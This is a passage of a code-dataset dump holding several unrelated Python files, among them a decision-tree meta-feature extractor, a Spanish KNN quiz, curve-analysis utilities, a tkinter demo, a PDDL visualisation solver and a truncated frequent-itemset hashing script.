diffs\n\ntruths, preds, quals, diffs = optimize_me(382, 0.5, 0.5, 0.5, 1, 32, 128, 1, 128)\nsns.heatmap(diffs, cmap='viridis', vmax=8)\nplt.show()\n","sub_path":"tape.py","file_name":"tape.py","file_ext":"py","file_size_in_byte":26417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"272064764","text":"import numpy as np\nfrom sklearn.tree import DecisionTreeClassifier\n\nfrom meta_gan.feature_extraction.MetaFeatureApi import MetaFeature\nfrom sklearn.tree._tree import Tree\n\n\nclass DecisionTreeMeta(MetaFeature):\n def getLength(self) -> int:\n height = 1\n leaves_num = 1\n node_num = 1\n width = 1\n dev = 4\n max = 4\n mean = 4\n min = 3\n result = sum([height, leaves_num, node_num, width, dev, max, mean, min])\n return result\n\n @staticmethod\n def getHeight(tree: Tree) -> int:\n children_left = tree.children_left\n children_right = tree.children_right\n\n def walk(node_id):\n if children_left[node_id] != children_right[node_id]:\n left_max = 1 + walk(children_left[node_id])\n right_max = 1 + walk(children_right[node_id])\n return max(left_max, right_max)\n else: # leaf\n return 1\n\n root_node_id = 0\n return walk(root_node_id)\n\n @staticmethod\n def getLeavesNumber(tree: Tree) -> int:\n children_left = tree.children_left\n children_right = tree.children_right\n\n def walk(node_id):\n if children_left[node_id] != children_right[node_id]:\n left_max = 0 + walk(children_left[node_id])\n right_max = 0 + walk(children_right[node_id])\n return left_max + right_max\n else: # leaf\n return 1\n\n root_node_id = 0\n return walk(root_node_id)\n\n @staticmethod\n def getNodeNumber(tree: Tree) -> int:\n children_left = tree.children_left\n children_right = tree.children_right\n\n def walk(node_id):\n if children_left[node_id] != children_right[node_id]:\n left_max = 0 + walk(children_left[node_id])\n right_max = 0 + walk(children_right[node_id])\n return 1 + left_max + right_max\n else: # leaf\n return 0\n\n root_node_id = 0\n return walk(root_node_id)\n\n @staticmethod\n def getWidth(tree: Tree, height: int) -> int:\n children_left = tree.children_left\n children_right = tree.children_right\n\n def walk(node_id, level):\n if level == 0:\n return 1\n if children_left[node_id] == children_right[node_id]:\n return 0\n if children_left[node_id] != children_right[node_id]:\n left_max = walk(children_left[node_id], level - 1)\n right_max = walk(children_right[node_id], level - 1)\n return left_max + right_max\n else: # leaf\n return 0\n\n root_node_id = 0\n width = 0\n for i in range(height):\n width = max(width, walk(root_node_id, i))\n return width\n\n def getAttrs(self, tree: Tree) -> [float]:\n attrs = [0.0] * self.features\n children_left = tree.children_left\n children_right = tree.children_right\n feature = tree.feature\n\n def walk(node_id, counts) -> [float]:\n if children_left[node_id] != children_right[node_id]:\n counts[feature[node_id]] += 1\n left = walk(children_left[node_id], counts)\n right = walk(children_right[node_id], left)\n return right\n else:\n return counts\n\n root_node_id = 0\n return walk(root_node_id, attrs)\n\n def getBranches(self, tree: Tree) -> [float]:\n branches = [0.0] * self.getLeavesNumber(tree)\n children_left = tree.children_left\n children_right = tree.children_right\n\n def walk(node_id, counts, lenght, index) -> [float]:\n if children_left[node_id] == children_right[node_id]:\n counts[index] += lenght\n return index + 1\n else:\n left = walk(children_left[node_id], counts, lenght + 1, index)\n right = walk(children_right[node_id], counts, lenght + 1, left)\n return right\n\n root_node_id = 0\n walk(root_node_id, branches, 0, 0)\n return branches\n\n def getClasses(self, tree: Tree) -> [float]:\n classes = [0.0] * 2\n children_left = tree.children_left\n children_right = tree.children_right\n value = tree.value\n\n def walk(node_id, counts) -> [float]:\n if children_left[node_id] == children_right[node_id]:\n class_no = np.argmax(value[node_id][0])\n counts[class_no] += 1\n return counts\n else:\n left = walk(children_left[node_id], counts)\n right = walk(children_right[node_id], left)\n return right\n\n root_node_id = 0\n return walk(root_node_id, classes)\n\n def getLevels(self, tree: Tree) -> [float]:\n height = self.getHeight(tree)\n levels = [0.0] * (height + 1)\n children_left = tree.children_left\n children_right = tree.children_right\n\n def walk(node_id, counts, level, height) -> [float]:\n if children_left[node_id] == children_right[node_id]:\n return\n if height == 0:\n counts[level] += 1\n walk(children_left[node_id], counts, level, height - 1)\n walk(children_right[node_id], counts, level, height - 1)\n return\n\n root_node_id = 0\n for i in range(height):\n walk(root_node_id, levels, i, i)\n return levels\n\n def max_(self, inp: [float]) -> float:\n return max(inp)\n\n def mean_(self, inp: [float]) -> float:\n return np.mean(np.array(inp)).item(0)\n\n def min_(self, inp: [float]) -> float:\n return min(inp)\n\n def dev_(self, inp: [float]) -> float:\n return np.std(np.array(inp)).item(0)\n\n def getMax(self, getAttrs, getBranches, getClasses, getLevels) -> [float]:\n attr = self.max_(getAttrs)\n branches = self.max_(getBranches)\n classes = self.max_(getClasses)\n levels = self.max_(getLevels)\n return [attr, branches, classes, levels]\n\n def getMin(self, getAttrs, getBranches, getClasses) -> [float]:\n attr = self.min_(getAttrs)\n branches = self.min_(getBranches)\n classes = self.min_(getClasses)\n return [attr, branches, classes]\n\n def getDev(self, getAttrs, getBranches, getClasses, getLevels) -> [float]:\n attr = self.dev_(getAttrs)\n branches = self.dev_(getBranches)\n classes = self.dev_(getClasses)\n levels = self.dev_(getLevels)\n return [attr, branches, classes, levels]\n\n def getMean(self, getAttrs, getBranches, getClasses, getLevels) -> [float]:\n attr = self.mean_(getAttrs)\n branches = self.mean_(getBranches)\n classes = self.mean_(getClasses)\n levels = self.mean_(getLevels)\n return [attr, branches, classes, levels]\n\n def getMeta(self, zero_in: np.ndarray, one_in: np.ndarray) -> np.ndarray:\n data_in = self.data(zero_in, one_in)\n labels_in = self.labels()\n d_tree = DecisionTreeClassifier(random_state=0)\n d_tree.fit(data_in, labels_in)\n tree = d_tree.tree_\n\n height = self.getHeight(tree)\n leaves_num = self.getLeavesNumber(tree)\n node_num = self.getNodeNumber(tree)\n width = self.getWidth(tree, height)\n\n attr = self.getAttrs(tree)\n branches = self.getBranches(tree)\n classes = self.getClasses(tree)\n levels = self.getLevels(tree)\n\n max = self.getMax(attr, branches, classes, levels)\n min = self.getMin(attr, branches, classes)\n dev = self.getDev(attr, branches, classes, levels)\n mean = self.getMean(attr, branches, classes, levels)\n result = [height, leaves_num, node_num, width]\n result.extend(max)\n result.extend(min)\n result.extend(dev)\n result.extend(mean)\n return np.array(result)\n\n\nif __name__ == '__main__':\n meta = DecisionTreeMeta(4, 3)\n arr = np.array([[1, 1, 1, 1],\n [0.2, 0.3, 0, 0],\n [0.2, 0, 0, 1]])\n print(meta.getMeta(arr, arr - 0.5))\n print(meta.getLength())\n","sub_path":"meta_gan/feature_extraction/DecisionTreeMeta.py","file_name":"DecisionTreeMeta.py","file_ext":"py","file_size_in_byte":8214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"458406556","text":"import matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport requests\r\nfrom io import BytesIO\r\nimport sys\r\nsys.path.insert(1, '../../../common')\r\nfrom checkpoint import *\r\n\r\ndescripcion_1 = '''\r\nDurante el entrenamiento de un modelo de clasificación:\r\n'''\r\nopciones_1 = ['El modelo aprende a predecir un valor numérico dado un conjunto de atributos',\r\n 'El modelo aprende a predecir un valor categórico dado un conjunto de atributos',\r\n 'El modelo busca agrupar los datos según su cercanía',\r\n 'Ninguna de las anteriores es correcta']\r\nfeedback_1 = ['Si predijera un valor numérico, más que un modelo de clasificación, sería un modelo de regresión.',\r\n '¡Exacto!',\r\n 'Aunque hay modelos de clasificación que se basan en nociones de cercanía o distancia, como KNN, el objetivo de un clasificador no es agrupar los datos más similares entre sí.',\r\n '¡Repasá bien las opciones porque hay una que es correcta!']\r\ntest_1 = create_multiple_choice(descripcion_1, opciones_1, opciones_1[1], feedback_1)\r\n\r\n\r\ndescripcion_2 = '''\r\nKNN es un modelo basado en instancias porque:\r\n'''\r\nopciones_2 = ['Entrena con instancias, es decir, con ejemplos',\r\n 'Generaliza lo que aprende de las instancias con las que entrena',\r\n 'Memoriza las instancias de entrenamiento y luego clasifica datos nuevos en base a las instancias memorizadas',\r\n 'Ninguna de las anteriores es correcta']\r\nfeedback_2 = ['¿Existe algún modelo de machine learning que no aprenda con ejemplos?',\r\n 'Cualquier modelo predictivo se va a encargar de generalizar a partir de datos de entrenamiento',\r\n '¡Perfecto! Vimos que KNN compara cada dato de test contra todos los datos de train para poder detectar los vecinos más cercanos, de ahí la noción de modelo basado en instancias.',\r\n '¡Repasá bien las opciones porque hay una que es correcta!']\r\ntest_2 = create_multiple_choice(descripcion_2, opciones_2, opciones_2[2], feedback=feedback_2)\r\n\r\n\r\ndescripcion_3 = '''\r\nEl hiperparámetro k de KNN (en Scikit - Learn, `n_neighbors`):\r\n'''\r\nopciones_3 = ['Hace referencia a la cantidad de instancias que va a memorizar',\r\n 'Aumenta el sesgo del modelo',\r\n 'Hace referencia a la cantidad de vecinos que considera para clasificar cada nueva observación',\r\n 'Define qué caso particular de métrica de distancia de Minkowsky se va a considerar']\r\nfeedback_3 = ['KNN memoriza todas las instancias del set de entrenamiento.',\r\n 'Si bien típicamente cuanto mayor sea el k, mayor será el sesgo del modelo, esto no significa que el valor de k per se esté asociado a un mayor sesgo.',\r\n '¡Muy bien! k es el hiperparámetro del modelo que define cuántos vecinos se van a considerar al momento de hacer las predicciones.',\r\n 'En este caso, no se trata de k sino de p.']\r\n\r\ntest_3 = create_multiple_choice(descripcion_3, opciones_3, opciones_3[2], feedback_3)\r\n\r\n\r\ndescripcion_4 = '''\r\nSi cada \"cuadra\" de este callejero cuadriculado tiene una longitud de 1, ¿cuál es la distancia euclídea entre los puntos? ¿Y la distancia Manhattan?\r\n'''\r\nopciones_4 = ['Distancia euclídea = 12, distancia Manhattan = 8.49',\r\n 'Distancia euclídea = 36, distancia Manhattan = 12',\r\n 'Distancia euclídea = 8.49, distancia Manhattan = 12',\r\n 'Distancia euclídea = 12, distancia Manhattan = 12']\r\nfeedback_4 = ['¡Revisá las fórmulas!',\r\n '¡Revisá las fórmulas!',\r\n '¡Correcto!',\r\n '¡Revisá las fórmulas!']\r\n\r\ndef test_4():\r\n response = requests.get('https://upload.wikimedia.org/wikipedia/commons/thumb/0/08/Manhattan_distance.svg/800px-Manhattan_distance.svg.png')\r\n img = Image.open(BytesIO(response.content))\r\n basewidth = 350\r\n wpercent = (basewidth/float(img.size[0]))\r\n hsize = int((float(img.size[1])*float(wpercent)))\r\n img = img.resize((basewidth,hsize), Image.ANTIALIAS)\r\n display(img)\r\n create_multiple_choice(descripcion_4, opciones_4, opciones_4[2], feedback_4)()\r\n\r\n\r\ndescripcion_5 = \"\"\"\r\nConsidere la siguiente matriz de un confusión. ¿Cuál es el accuracy del modelo?\r\n\"\"\"\r\nopciones_5 = ['70/120', '60/90', '10/30', '50/120']\r\nfeedback_5 = ['¡Correcto!',\r\n 'Recordá que el accuracy mide la proporción de clasificaciones corectas sobre el total.',\r\n 'Recordá que el accuracy mide la proporción de clasificaciones corectas sobre el total.',\r\n 'Recordá que el accuracy mide la proporción de clasificaciones corectas sobre el total.']\r\n\r\ndef test_5():\r\n\r\n fig = plt.figure()\r\n \r\n tabla = plt.table(cellText = np.array([[60, 20, 80],\r\n [30, 10, 40],\r\n [90, 30, 120]]),\r\n cellLoc = 'center',\r\n colLabels=['Predice clase negativa', 'Predice clase positiva', 'Total'],\r\n rowLabels=['Clase negativa', 'Clase positiva', 'Total'],\r\n loc='left')\r\n tabla.scale(2, 5)\r\n tabla.set_fontsize(30)\r\n plt.axis('off');\r\n \r\n create_multiple_choice(descripcion_5, opciones_5, opciones_5[0], feedback_5, fig=fig)()","sub_path":"CLASE_19_Intro-Clasif-KNN/Notebooks/checkpoint_knn.py","file_name":"checkpoint_knn.py","file_ext":"py","file_size_in_byte":5394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"394609051","text":"import numpy as np\nfrom scipy import signal\n\n\ndef calculo_maximo(data, time):\n \"\"\"\n Calculates the largest value of the incoming data, and returns the time and position at which this largest value is found.\n param data: Data in which the max is searched.\n param time: Array of time, corresponds to the time of each data entry\n return: max value, time at which it occurs, and the position of the array\n \"\"\"\n input_data = np.array(data)\n pos_max = signal.find_peaks_cwt(input_data, np.arange(1, 150))[0]\n time_max = np.array(time)[pos_max]\n max_element = np.round(input_data[pos_max], 2)\n\n return max_element, time_max, pos_max\n\n\ndef calculo_pendiente(data, time):\n \"\"\"\n Returns the initial slope, considering the rise time of the curve as the moment where the data rises from 10% of the maximum to 90% of the maximum.\n of maximum to 90% of maximum\n param data: Input data, X-axis\n param time: Time data, Y-axis\n return: value of slope, initial time, final time, initial value, final value\n \"\"\"\n max_data, time_max, pos_max = calculo_maximo(data, time)\n por10 = max_data*0.1\n por90 = max_data*0.9\n first = 0\n last = 0\n for valor in np.array(data):\n if valor > por10 and first == 0:\n first = valor\n continue\n if valor < por90:\n last = valor\n continue\n else:\n break\n pos_first = np.where(np.array(data) == first)[0][0]\n pos_last = np.where(np.array(data) == last)[0][0]\n time_first = np.array(time).astype(np.float)[pos_first]\n time_last = np.array(time).astype(np.float)[pos_last]\n try:\n p = np.round((last-first)/(time_last-time_first), 2)\n except ZeroDivisionError:\n p = 0\n return p, time_first, time_last, first, last\n\n\ndef calculo_area_curva(data, time):\n \"\"\"\n Given the time and data, calculate the area of the curve using Numpy trampz\n param data: Array with the values of the averages of the intensities\n param time: Array with the time values of the images\n :return: calculated area, rounded to the second decimal place\n \"\"\"\n input_data = np.array(data)\n input_time = np.array(time)\n input_time = input_data.astype(np.float)\n area = np.round(np.trapz(input_data, input_time), 2)\n return area\n","sub_path":"Interface/utils/valores_curvas.py","file_name":"valores_curvas.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"161549268","text":"# ch8_2.py\nfrom tkinter import *\n\nroot = Tk()\nroot.title(\"ch8_2\")\n\n# 用字典儲存框架顏色與游標外形\nfms = {'red':'cross','green':'boat','blue':'clock'}\nfor fmColor in fms: # 建立3個不同底色的框架與游標外形\n Frame(root,bg=fmColor,cursor=fms[fmColor],\n height=50,width=200).pack(side=LEFT)\n\nroot.mainloop()\n\n\n\n\n\n\n\n\n","sub_path":"_4.python/__code/Python GUI 設計活用 tkinter之路/ch8/ch8_2.py","file_name":"ch8_2.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"447793574","text":"\"\"\"This module will compute the visulisation file by using the stages predicates and animation\"\"\"\n# -----------------------------Authorship-----------------------------------------\n# -- Authors : YD\n# -- Group : Planning Visualisation\n# -- Date : 16/September/2018\n# -- Version : 2.0\n# --------------------------------------------------------------------------------\n# -----------------------------Reviewer-------------------------------------------\n# -- Authors : Sai\n# -- Group : Planning Visualisation\n# -- Date : 16/October/2018\n# -- Version : 2.0\n# --------------------------------------------------------------------------------\nimport copy\nimport os\nimport sys\n\nsys.path.append(os.path.abspath(os.path.dirname(__file__) + '/../' + \"extension\"))\nsys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + \"vfg/solver\"))\nsys.path.append(os.path.abspath(os.path.dirname(__file__)))\nimport Custom_functions\nimport Initialise\nimport Subgoal\n\n\ndef check_rule_complete(predicate, objects_dic, predicates_rules):\n \"\"\"\n This funtion will check whether the predicate can be solved.\n It will check all the referenced object value by using the predicates_rules,\n for example, (on a b) as an predicates, the animation rules will say to define\n the position of a, it must know b's x postion and y position first. If b's refereced\n value has not been defined, the check_rule_complete function will return false.\n\n :param predicate: a predicate that need to be checked, eg.(on-table b).\n :param objects_dic: the current objects dictionary that need to be solved.\n :param predicates_rules: rules defined the animation rule for the predicates.\n :return: True: if the predicate can be solved.\n False: if the predicate can not be solved.\n \"\"\"\n\n pname = predicate[\"name\"]\n predicate_rule = predicates_rules[pname]\n objects_list_ref = predicate_rule[\"objects\"]\n objects = predicate[\"objectNames\"]\n if \"custom_obj\" in predicate_rule:\n # addtional custom object not in the real pddl file\n custom_obj = predicate_rule[\"custom_obj\"]\n # complete object list\n object_list = objects + custom_obj\n objects_list_ref = objects_list_ref + custom_obj\n else:\n object_list = objects\n obj_ref_dic = dict(zip(objects_list_ref, object_list))\n if \"require\" in predicate_rule:\n for obj_index in predicate_rule[\"require\"]:\n for property in predicate_rule[\"require\"][obj_index]:\n objectname = obj_ref_dic[obj_index]\n if objects_dic[objectname][property] is False:\n return False\n return True\n\n\ndef applypredicates(predicate,\n objects_dic,\n predicates_rules,\n gstate):\n \"\"\"\n update the value of realated obj in the objects_dic by applying the animation rules.\n For example, (on-table a) will set the a's x value by using distributex function and a's\n y value to 0.\n :param predicate:a predicate that need to be solved.\n :param objects_dic: a objects dictionary that contain all the objects and its attributes.\n :param predicates_rules:rules defined the animation rule for the predicates\n :param gstate: an dictionary which remember all the state for custom function\n :return:\n \"\"\"\n\n pname = predicate[\"name\"]\n predicate_rule = predicates_rules[pname]\n objects_list_ref = predicate_rule[\"objects\"]\n # objects in the real pddl file\n objects = copy.deepcopy(predicate[\"objectNames\"])\n if \"custom_obj\" in predicate_rule:\n # addtional custom object not in the real pddl file\n custom_obj = predicate_rule[\"custom_obj\"]\n # complete object list\n object_list = objects + custom_obj\n objects_list_ref = objects_list_ref + custom_obj\n else:\n object_list = objects\n\n obj_ref_dic = dict(zip(objects_list_ref, object_list))\n for rulename in predicate_rule[\"rules\"]:\n if \"value\" in predicate_rule[rulename]:\n rule = predicate_rule[rulename]\n left, propertyname = get_objname_property(rule[\"left\"], obj_ref_dic)\n value = predicate_rule[rulename][\"value\"]\n if \"function\" in value:\n fproperty = value[\"function\"]\n fname = fproperty[\"fname\"]\n obj_indexs = fproperty[\"obj_indexs\"]\n if \"settings\" in fproperty:\n settings = fproperty[\"settings\"]\n else:\n settings = {}\n state = gstate[fname]\n obj_list = []\n for obj_index in obj_indexs:\n objname = obj_ref_dic[obj_index]\n obj_list.append({objname: objects_dic[objname]})\n result = Custom_functions.customf_controller(fname, obj_list, settings, state, False)\n update_object(objects_dic[left], propertyname, gstate, fname, result)\n elif \"equal\" in value:\n right_value = value[\"equal\"]\n if type(right_value) is not dict:\n objects_dic[left][propertyname[0]] = right_value\n else:\n if \"r\" in right_value: # for color\n objects_dic[left][propertyname[0]] = right_value\n else:\n right_object, right_property = get_objname_property(right_value, obj_ref_dic)\n objects_dic[left][propertyname[0]] = objects_dic[right_object][right_property]\n\n elif \"add\" in value:\n rightvalue = 0\n for additem in value[\"add\"]:\n if type(additem) is dict:\n\n right_object, right_property = get_objname_property(additem, obj_ref_dic)\n addvalue = objects_dic[right_object][right_property]\n rightvalue += addvalue\n else:\n rightvalue += additem\n objects_dic[left][propertyname[0]] = rightvalue\n else:\n # if the rule is action rule\n action = predicate_rule[rulename][\"action\"]\n if \"function\" in action:\n fproperty = action[\"function\"]\n fname = fproperty[\"fname\"]\n obj_indexs = fproperty[\"obj_indexs\"]\n if \"settings\" in fproperty:\n settings = fproperty[\"settings\"]\n else:\n settings = {}\n state = gstate[fname]\n obj_list = []\n for obj_index in obj_indexs:\n objname = obj_ref_dic[obj_index]\n obj_list.append({objname: objects_dic[objname]})\n\n key, value = Custom_functions.customf_controller(fname, obj_list, settings, state, False)\n objects_dic[key] = value\n\n\ndef get_objname_property(property_dic, obj_ref_dic):\n \"\"\"\n This function turn the general object and property dic into a specific object and property tuple.\n :param property_dic: dictionary contain the key and it's property. eg. {\"?x\",[\"x\"]}\n :param obj_ref_dic: dictionary contain the key and it's corresponding object. eg. {\"?x\",\"obj\"}\n :return: a tuple which conatin the object name and it's properties (\"obj\",\"x\")\n \"\"\"\n\n object_index, propertyname = list(property_dic.items())[0]\n objname = obj_ref_dic[object_index]\n return objname, propertyname\n\n\ndef update_object(objectdic, properties, gstate, fname, result):\n \"\"\"\n This function update object dic based on the custom function result\n :param objectdic: an single object dictionary that need to be solved\n :param properties: properties of the object need to be updated\n :param gstate: state of all the custom function\n :param fname: function name\n :param result: custom function result\n\n \"\"\"\n new_properties, newstate = result\n gstate[fname] = newstate\n if len(properties) != len(new_properties):\n raise ValueError(\"customer function: \" + fname + \" returns \" + str(len(new_properties)) + \" properties, but \"\n + str(len(properties)) + \" properties was given.\")\n try:\n for property in properties:\n objectdic[property] = new_properties[property]\n except:\n helpinfo = \"(\"\n for key in new_properties.keys():\n helpinfo += str(key) + \" \"\n helpinfo += \")\"\n raise ValueError(\"Property \" + str(property) + \" is not returned by customer function:\" + fname +\n \", property \" + helpinfo + \" are returned\")\n\n\ndef solvepredicates(predicates, objects_dic, predicates_rules, gstate):\n \"\"\"\n This function will pop an predicate from a list of predicates, and try to solve\n it, the predicate will be put back to the predicates list if it can not be solved at\n one turn. The funtion will return true if all the predicates has been solved.\n :param predicates: a list of predicates that need to be solved.\n :param objects_dic: a dictionary of objects that its attribtes has to be solved\n :param predicates_rules: animation rules of predicates.\n :param gstate: global state of all custom function\n :return: True if the predicate are solved\n \"\"\"\n \"\"\"This function will pop an predicate from a list of predicates, and try to solve\n it, the predicate will be put back to the predicates list if it can not be solved at\n one turn. The funtion will return true if all the predicates has been solved.\n Args:\n predicates(list of String): a list of predicates that need to be solved.\n objects_dic(dictionary): a dictionary of objects that its attribtes has to be solved\n predicates_rules(dictonaru): animation rules of predictates.\n space(array):an array that will be used for distributex funtion, it remeber the current obj\n that in the space.\n\n \"\"\"\n i = 0\n while (predicates and i < 2000):\n predicate = predicates.pop(0)\n if predicate[\"name\"] not in predicates_rules:\n continue\n if check_rule_complete(predicate, objects_dic, predicates_rules):\n\n applypredicates(predicate, objects_dic, predicates_rules, gstate)\n else:\n if not predicates: # if the last predicate can not be solved\n return False\n predicates.append(predicate)\n i += 1\n return True\n\n\ndef keysort(predicate_name, predicates_rules):\n \"\"\"\n This funtion will return weight for each predicates, default 10(not important).\n 0 means very important.\n :param predicate_name: name of a predicate\n :param predicates_rules: predicate_rules for the all predicate\n :return: integer\n \"\"\"\n if predicate_name in predicates_rules:\n if \"priority\" in predicates_rules[predicate_name]:\n return predicates_rules[predicate_name][\"priority\"]\n else:\n return 10\n else:\n return 10\n\n\ndef priority(predicates, predicates_rules):\n \"\"\"\n This funtion will return sorted predicates based on the priority point\n :param predicates: list of predicate\n :param predicates_rules: predicate_rules for the all predicate\n :return: sorted predicates list\n \"\"\"\n return sorted(predicates, key=lambda k: keysort(k[\"name\"], predicates_rules))\n\n\ndef solve_all_stages(stages, objects_dic, predicates_rules, gstate, actionlist, problem_dic):\n \"\"\"\n This funtion will run through each stage which contains a list of predicates, solve the\n predictaes and get the solved visualistaion file.\n :param stages: a dictinonary which contain list of predicates for different stages/steps.\n :param objects_dic: a dictionary of objects which need to be solved.\n :param predicates_rules: animation rules for the predicates\n :param gstate(global state): a dictionary contain all the custom function state information\n :param actionlist: action list\n :param problem_dic: problem dictionary contain the goal state\n :return: visualisation dictionary that contain the location of each object for different stages\n \"\"\"\n\n result = {}\n result[\"visualStages\"] = []\n for stage in stages:\n\n stage_dic = {}\n object_dic_copy = copy.deepcopy(objects_dic)\n predicates = stage[\"items\"]\n sorted_predicates = priority(predicates, predicates_rules)\n\n # For hanoi problem, reset each stage\n # For logistics problem, reset each stage\n for fname in gstate[\"reset_function\"]:\n gstate[fname] = {}\n solvepredicates(sorted_predicates, object_dic_copy, predicates_rules, gstate)\n stage_dic[\"visualSprites\"] = object_dic_copy\n if \"stageName\" not in stage:\n stage_dic[\"stageName\"] = \"Inital Stage\"\n stage_dic[\"stageInfo\"] = \"No step information\"\n\n else:\n stage_dic[\"stageName\"] = stage[\"stageName\"]\n stage_dic[\"stageInfo\"] = stage[\"stageInfo\"]\n\n result[\"visualStages\"].append(stage_dic)\n\n result[\"subgoals\"] = Subgoal.get_subgoal(stages, problem_dic[1]['goal'].copy(), actionlist.copy())\n\n return result\n\n\ndef add_custome_objects(object_dic, animation_profile):\n \"\"\"\n This function will added the custom object to the obj_dic\n :param object_dic: a object dictionary contain the default objects.\n :param animation_profile: a dict to store all information in animation profile.\n :return:\n \"\"\"\n for visual in animation_profile[\"objects\"][\"custom\"]:\n objects = animation_profile[\"objects\"][\"custom\"][visual]\n for obj_name in objects:\n object_dic[obj_name] = animation_profile[\"visual\"][visual].copy()\n object_dic[obj_name][\"name\"] = obj_name\n\n\ndef get_visualisation_dic(predicates, animation_profile, actionlist, problem_dic):\n \"\"\"\n This function is the main function of this module, it will call the other functions\n to manipulate the visualisation file for the unity visualiser.\n :param predicates: an dictionary contains the 1.objects name and the 2.predicates for each stages.\n :param animation_profile: a dict to store all information in animation profile.\n :param actionlist: list of action to achieve the goal\n :param problem_dic: problem dictionary contain the init and goal predicates\n :return: dictionary contain all the solved stages for visualisation\n \"\"\"\n\n object_list = copy.deepcopy(predicates[\"objects\"])\n stages = copy.deepcopy(predicates[\"stages\"])\n predicates_rules = animation_profile[\"predicates_rules\"]\n objects_dic = Initialise.initialise_objects(object_list, animation_profile)\n gstate = Initialise.initialise_custom_functions()\n add_custome_objects(objects_dic, animation_profile)\n result = solve_all_stages(stages, objects_dic, predicates_rules, gstate, actionlist, problem_dic)\n\n return result\n","sub_path":"server/app/vfg/solver/Solver.py","file_name":"Solver.py","file_ext":"py","file_size_in_byte":14852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"522023971","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport sys\nimport multiprocessing as mp\n\nmaindirectory = \"G:/Behavioral Data/Sonntag Lab Dropbox/Phenotyper/Investigators/\" \ninvestigator = str(sys.argv[1])\ntreatment = str(sys.argv[2])\ndirectory0 = maindirectory + investigator + \"/\"\ndirectory1 = directory0 + \"Data/Raw/\" + treatment + \"/\"\n\ndef Mouse(mouselocation):\n\tmouse = pd.read_csv(mouselocation)\n\tdel mouse[\"Unnamed: 0\"]\n\tmouse.to_csv(mouselocation, index=False)\n\t\nos.chdir(directory1)\nanimals = os.listdir()\n\nif __name__=='__main__':\n\tpool = mp.Pool(processes=4)\n\tpool.map_async(Mouse, animals)\n\tpool.close()\n\tpool.join()","sub_path":"removeindexcolumn.py","file_name":"removeindexcolumn.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"259960446","text":"\"\"\"\r\nGiven a text file, write a program to create another text file deleting the words 'a', 'an', 'the' and replacing\r\nthem each one of them with a blank space.\r\n\"\"\"\r\n\r\nwith open('sample-text.txt', 'r') as file:\r\n with open('updated-sample-text.txt', 'w') as file2:\r\n lines = file.readlines()\r\n for line in lines:\r\n line = line.replace(' a ', ' ')\r\n line = line.replace(' an ', ' ')\r\n line = line.replace(' the ', ' ')\r\n file2.writelines(line)","sub_path":"Chapter-16-File-Input-Output/Exercise/B/k-replace-articles-in-file-with-space.py","file_name":"k-replace-articles-in-file-with-space.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"251815575","text":"n = int(input())\naes = list(map(int, input().split()))\n\naes_left = aes[:]\n\nans = 0\ni = 0\nwhile i < n // 2:\n s = n // 2\n maxs = 0\n maxhappys = 0\n while s < n:\n if aes[s] * (s - i) > maxhappys:\n maxhappys = aes[s] * (s - i)\n maxs = s\n s += 1\n aes[maxs] = 0\n ans += maxhappys\n\n t = 1\n maxt = 0\n maxhappyt = 0\n while t < n // 2 + 1:\n if aes[-t] * (-t - 1) > maxhappyt:\n maxhappyt = aes[t] * (-t -1)\n maxt = t\n t += 1\n aes[maxt] = 0\n ans += maxhappyt\n\n print(maxhappys, maxhappyt, aes)\n\n i+= 1\n \nprint(ans)","sub_path":"beginner_contest163/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"610633314","text":"import sys\n\ndef hashing_func(tablesize,string_to_hash):\n sum = 0\n for i in string_to_hash:\n sum+=ord(i)\n hash_value=sum%tablesize\n return(hash_value)\n\ndef getWords(words_file):\n word_count_map = {}\n with open(words_file, 'r') as f:\n for line in f.readlines():\n for word in line.strip().split(\",\"):\n if word in word_count_map:\n word_count_map[word] += 1\n else:\n word_count_map[word] = 1\n return word_count_map\n\ndef Singles():\n min_support=int(sys.argv[2])\n inputdata = open(sys.argv[1])\n SingleWords=[]\n no_of_buckets=int(sys.argv[3])\n bitmap=[]*no_of_buckets \n bucket_count=[0]*no_of_buckets\n wordsDict = getWords(sys.argv[1])\n for keys in sorted(wordsDict.keys()):\n if wordsDict[keys]>=min_support:\n SingleWords.append(keys)\n if SingleWords:\n print (\"Frequent Itemsets of size 1\")\n for word in sorted(SingleWords):\n print (word)\n print(\"\\n\")\n\n\n inputdata = open(sys.argv[1])\n for line in inputdata:\n itemsperline=[]\n for words in line.strip().split(\",\"):\n itemsperline.append(words) \n \n for i in range(0,len(itemsperline)-1):\n for j in range(0,len(itemsperline)):\n hash_val=hashing_func(no_of_buckets,(itemsperline[i]+itemsperline[j]))\n bucket_count[hash_val]+=1\n for value in bucket_count:\n if valueitemsperline[i]:\n pairing.append((itemsperline[i],itemsperline[j]))\n else :\n pairing.append((itemsperline[i],itemsperline[i]))\n norepeat = []\n [norepeat.append(item) for item in pairing if item not in norepeat]\n word_count_dict={}\n inputdata = open(sys.argv[1])\n for line in inputdata:\n for word in norepeat:\n if word[0] in line and word[1] in line:\n if word[0]word[1]:\n tuple1=(word[1],word[0])\n word_count_dict[tuple1] = word_count_dict.get(tuple1, 0) + 1\n FreqPairs=[]\n for tuple1 in word_count_dict:\n if word_count_dict[tuple1]>=min_support:\n 